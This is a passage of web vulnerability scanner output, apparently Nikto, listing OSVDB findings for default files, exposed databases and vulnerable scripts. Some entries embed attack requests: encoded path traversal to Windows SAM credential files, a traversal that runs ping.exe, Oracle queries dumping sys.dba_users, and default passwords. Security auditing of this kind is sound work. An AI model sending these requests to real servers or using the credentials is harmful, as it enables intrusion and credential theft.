  303. + OSVDB-3233: /_vti_bin/admin.pl: Default FrontPage CGI found.
  304. + OSVDB-3233: /_vti_bin/cfgwiz.exe: Default FrontPage CGI found.
  305. + OSVDB-3233: /_vti_bin/CGImail.exe: Default FrontPage CGI found.
  306. + OSVDB-3233: /_vti_bin/contents.htm: Default FrontPage CGI found.
  307. + OSVDB-3233: /_vti_bin/fpadmin.htm: Default FrontPage CGI found.
  308. + OSVDB-3233: /_vti_bin/fpremadm.exe: Default FrontPage CGI found.
  309. + OSVDB-3233: /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found.
  310. + OSVDB-3233: /_vti_bin/_vti_cnf/: FrontPage directory found.
  311. + OSVDB-3233: /_vti_cnf/_vti_cnf/: FrontPage directory found.
  312. + OSVDB-3233: /_vti_log/_vti_cnf/: FrontPage directory found.
  313. + OSVDB-3233: /_vti_pvt/administrators.pwd: Default FrontPage file found, may be a password file.
  314. + OSVDB-3233: /_vti_pvt/authors.pwd: Default FrontPage file found, may be a password file.
  315. + OSVDB-3233: /_vti_pvt/service.pwd: Default FrontPage file found, may be a password file.
  316. + OSVDB-3233: /_vti_pvt/users.pwd: Default FrontPage file found, may be a password file.
  317. + OSVDB-3233: /help/contents.htm: Default Netscape manual found. All default pages should be removed.
  318. + OSVDB-3233: /help/home.html: Default Netscape manual found. All default pages should be removed.
  319. + OSVDB-3233: /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed.
  320. + OSVDB-3233: /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.
  321. + OSVDB-3233: /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers.
  322. + OSVDB-3233: /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers.
  323. + OSVDB-3233: /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers.
  324. + OSVDB-3233: /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.
  325. + OSVDB-3233: /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers.
  326. + OSVDB-3233: /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system.
  327. + OSVDB-3233: /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system.
  328. + OSVDB-3233: /servlet/ServletManager: Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.
  329. + OSVDB-3233: /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system.
  330. + OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
  331. + OSVDB-3233: /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.
  332. + OSVDB-3233: /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers.
  333. + OSVDB-3233: /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers.
  334. + OSVDB-3233: /doc/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
  335. + OSVDB-3233: /doc/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
  336. + OSVDB-3233: /doc/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
  337. + OSVDB-3233: /doc/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
  338. + OSVDB-3233: /doc/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
  339. + OSVDB-3233: /doc/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
  340. + OSVDB-3233: /doc/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
  341. + OSVDB-3233: /doc/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
  342. + OSVDB-3233: /doc/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
  343. + OSVDB-3233: /doc/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
  344. + OSVDB-3233: /doc/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
  345. + OSVDB-3233: /doc/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
  346. + OSVDB-3233: /doc/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
  347. + OSVDB-3233: /doc/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
  348. + OSVDB-3233: /doc/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
  349. + OSVDB-3233: /domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
  350. + OSVDB-3233: /dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
  351. + OSVDB-3233: /help/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
  352. + OSVDB-3233: /help/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
  353. + OSVDB-3233: /help/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
  354. + OSVDB-3233: /help/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
  355. + OSVDB-3233: /help/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
  356. + OSVDB-3233: /help/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
  357. + OSVDB-3233: /help/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
  358. + OSVDB-3233: /help/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
  359. + OSVDB-3233: /help/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
  360. + OSVDB-3233: /help/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
  361. + OSVDB-3233: /help/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
  362. + OSVDB-3233: /help/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
  363. + OSVDB-3233: /help/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
  364. + OSVDB-3233: /help/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
  365. + OSVDB-3233: /help/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
  366. + OSVDB-3233: /help4.nsf: This documentation database can be read without authentication. All default files should be removed.
  367. + OSVDB-3233: /helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
  368. + OSVDB-3233: /helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
  369. + OSVDB-3233: /internet.nsf: This documentation database can be read without authentication. All default files should be removed.
  370. + OSVDB-3233: /javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
  371. + OSVDB-3233: /lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
  372. + OSVDB-3233: /migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
  373. + OSVDB-3233: /npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
  374. + OSVDB-3233: /npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
  375. + OSVDB-3233: /readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
  376. + OSVDB-3233: /readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
  377. + OSVDB-3233: /smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
  378. + OSVDB-3233: /srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
  379. + OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  380. + OSVDB-3233: /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  381. + OSVDB-3233: /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  382. + OSVDB-3233: /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  383. + OSVDB-3233: /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  384. + OSVDB-3233: /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  385. + OSVDB-3233: /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  386. + OSVDB-3233: /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  387. + OSVDB-3233: /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  388. + OSVDB-3233: /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  389. + OSVDB-3233: /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  390. + OSVDB-3233: /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  391. + OSVDB-3233: /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  392. + OSVDB-3233: /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  393. + OSVDB-3233: /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  394. + OSVDB-3233: /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  395. + OSVDB-3233: /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  396. + OSVDB-3233: /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  397. + OSVDB-3233: /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  398. + OSVDB-3233: /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  399. + OSVDB-3233: /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  400. + OSVDB-3233: /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  401. + OSVDB-3233: /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  402. + OSVDB-3233: /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  403. + OSVDB-3233: /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  404. + OSVDB-3233: /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  405. + OSVDB-3233: /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  406. + OSVDB-3233: /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  407. + OSVDB-3233: /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  408. + OSVDB-3233: /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  409. + OSVDB-3233: /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  410. + OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  411. + OSVDB-3233: /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  412. + OSVDB-3233: /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  413. + OSVDB-3233: /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file that should be removed. CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  414. + OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
  415. + OSVDB-3233: /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'
  416. + OSVDB-3233: /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.
  417. + OSVDB-3282: /uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
  418. + OSVDB-3284: /iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  419. + OSVDB-3286: /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
  420. + OSVDB-3286: /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
  421. + OSVDB-3286: /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
  422. + OSVDB-3286: /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
  423. + OSVDB-3396: /mlog.html: Remote file read vulnerability 1999-0068
  424. + OSVDB-3396: /mlog.phtml: Remote file read vulnerability 1999-0068
  425. + OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
  426. + OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
  427. + OSVDB-3411: /soapConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
  428. + OSVDB-3423: /XSQLConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
  429. + OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.
  430. + OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  431. + OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  432. + OSVDB-3501: /_private/form_results.txt: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  433. + OSVDB-3512: /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).
  434. + OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
  435. + OSVDB-379: /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.
  436. + OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
  437. + OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
  438. + OSVDB-4161: /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely.
  439. + OSVDB-4161: /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  440. + OSVDB-4161: /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  441. + OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  442. + OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  443. + OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  444. + OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  445. + OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  446. + OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  447. + OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  448. + OSVDB-4237: /ban.bak: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  449. + OSVDB-4237: /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  450. + OSVDB-4237: /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  451. + OSVDB-4237: /banmat.pwd: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  452. + OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
  453. + OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
  454. + OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
  455. + OSVDB-4314: /texis.exe/?-dump: Texis installation may reveal sensitive information.
  456. + OSVDB-4314: /texis.exe/?-version: Texis installation may reveal sensitive information.
  457. + OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
  458. + OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
  459. + OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  460. + OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  461. + OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  462. + OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  463. + OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  464. + OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  465. + OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  466. + OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
  467. + OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
  468. + OSVDB-5092: /config.inc: DotBr 0.1 configuration file includes usernames and passwords.
  469. + OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
  470. + OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
  471. + OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
  472. + OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
  473. + OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
  474. + OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
  475. + OSVDB-5709: /.nsconfig: Contains authorization information
  476. + OSVDB-583: /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1: Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.
  477. + OSVDB-596: /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  478. + OSVDB-596: /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  479. + OSVDB-596: /dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  480. + OSVDB-596: /dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  481. + OSVDB-6666: /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
  482. + OSVDB-6670: /applist.asp: Citrix server may allow remote users to view applications installed without authenticating.
  483. + OSVDB-6671: /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.
  484. + OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
  485. + OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
  486. + OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
  487. + OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. CVE-2001-0868.
  488. + OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. CVE-2001-0868.
  489. + OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
  490. + OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp. CVE-1999-0449. BID-193.
  491. + OSVDB-707: /globals.jsa: Oracle globals.jsa file
  492. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  493. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  494. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  495. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  496. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  497. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  498. + OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  499. + OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  500. + OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  501. + OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  502. + OSVDB-9624: /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
  503. + OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
  504. + OSVDB-3092: /README: README file found.
  505. + OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
  506. + OSVDB-3233: /WebCacheDemo.html: Oracle WebCache Demo
  507. + OSVDB-32333: /webcache/: Oracle WebCache Demo
  508. + OSVDB-3233: /webcache/webcache.xml: Oracle WebCache Demo
  509. + OSVDB-3233: /bmp/: SQLJ Demo Application
  510. + OSVDB-3233: /bmp/global-web-application.xml: SQLJ Demo Application
  511. + OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
  512. + OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
  513. + OSVDB-3233: /bmp/README.txt: SQLJ Demo Application
  514. + OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
  515. + OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
  516. + OSVDB-3233: /ptg_upgrade_pkg.log: Oracle log files.
  517. + OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
  518. + OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
  519. + OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
  520. + OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
  521. + OSVDB-3233: /_pages/_demo/: Oracle JSP file
  522. + OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
  523. + OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
  524. + OSVDB-3233: //OA_HTML/_pages/: Oracle JSP file.
  525. + OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
  526. + OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
  527. + OSVDB-3233: /apex/: Oracle Application Express login screen.
  528. + OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
  529. + OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
  530. + OSVDB-3233: /aplogon.html: Oracle Applications Portal Page
  531. + OSVDB-3233: /appdet.html: Oracle Applications Portal Pages
  532. + OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
  533. + OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
  534. + OSVDB-3233: /reports/rwservlet: Oracle Reports
  535. + OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
  536. + OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
  537. + OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
  538. + OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
  539. + OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
  540. + OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
  541. + OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
  542. + OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact.
  543. + OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact.
  544. + OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact.
  545. + OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact.
  546. + OSVDB-3093: /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact.
  547. + OSVDB-3093: /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact.
  548. + OSVDB-3093: /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact.
  549. + OSVDB-3093: /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact.
  550. + OSVDB-3093: /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact.
  551. + OSVDB-3093: /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact.
  552. + OSVDB-3093: /pls/portal/PORTAL.wwa_app_module.link: Access to Oracle pages could have an unknown impact.
  553. + OSVDB-3093: /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact.
  554. + OSVDB-3093: /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact.
  555. + OSVDB-3093: /pls/portal/PORTAL.wwv_setting.render_css: Access to Oracle pages could have an unknown impact.
  556. + OSVDB-3093: /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact.
  557. + OSVDB-3093: /pls/portal/SELECT: Access to Oracle pages could have an unknown impact.
  558. + OSVDB-3093: /pls/portal/null: Access to Oracle pages could have an unknown impact.
  559. + OSVDB-3093: /OA_MEDIA/: Oracle Applications portal pages found.
  560. + OSVDB-3093: /OA_HTML/META-INF/: Oracle Applications portal pages found.
  561. + OSVDB-3093: /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found.
  562. + OSVDB-3093: /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found.
  563. + OSVDB-3093: /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found.
  564. + OSVDB-3093: /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found.
  565. + OSVDB-3093: /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found.
